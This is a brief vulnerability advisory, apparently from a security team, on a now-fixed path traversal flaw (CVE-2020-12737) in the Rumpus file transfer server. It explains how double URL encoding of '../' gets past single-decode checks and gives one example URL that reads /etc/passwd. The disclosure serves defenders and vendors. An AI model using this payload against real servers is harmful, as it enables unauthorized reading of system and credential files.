Vulnerability Found: CVE-2020-12737

We recently registered this CVSS after finding an issue with Rumpus file transfer server.

Rumpus

From the Rumpus website:

"Rumpus turns any Mac or PC into a complete file transfer server. Send files to outside people, or let clients upload files directly to your network in a secure, controlled environment. Rumpus supports FTP, FTPS, WebDAV, SFTP and a fully customizable Web file transfer interface and makes it easy to securely exchange files with anyone, anywhere."

The team at Rumpus fixed this issue quickly and the current version is not vulnerable.

Details

Authenticated users can access files outside their assigned directories using double encoded characters.

Using double encoding it’s possible to bypass security checks that only decode user input once. The second decoding process is executed by the backend platform or modules that properly handle encoded data, but don’t have the corresponding security checks in place

Hexadecimal encoding of “../” represents “%2E%2E%2f”
Encoding the “%” represents “%25”
Double encoding of “../” represents “%252E%252E%252F”

An example is shown below:

http://hostname/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd. 

-- The Escaped Team --